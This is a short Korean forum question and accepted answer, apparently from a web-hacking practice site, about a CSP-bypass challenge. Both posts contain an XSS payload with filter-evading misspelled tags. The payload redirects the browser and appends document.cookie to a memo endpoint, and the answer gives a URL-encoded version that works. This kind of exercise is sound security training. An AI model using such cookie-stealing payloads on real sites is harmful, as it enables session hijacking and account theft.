29 coins
<script src 로 문제를 해결할수 있을까요?(csp bypass 구문 입력)
제가 생각한건 csp bypass에서 제공된 아래 문구로 기입했으나 실패하여 문의드립니다.
<scronipt src="/vuln?param=locatioonn.href='/memo?memo='%2bdocument.cookie"></scrionpt>
#web
Author
Answers
1
This answer was accepted. Thanks for sharing!
Predic
웹해킹 입문
<scronipt%20src=%22/vuln?param=locatiooonnn.href=%27/memo?memo=%27%252bdocument.cookie%22%3E</scrionpt>
요렇게 하면 잘 작동하네요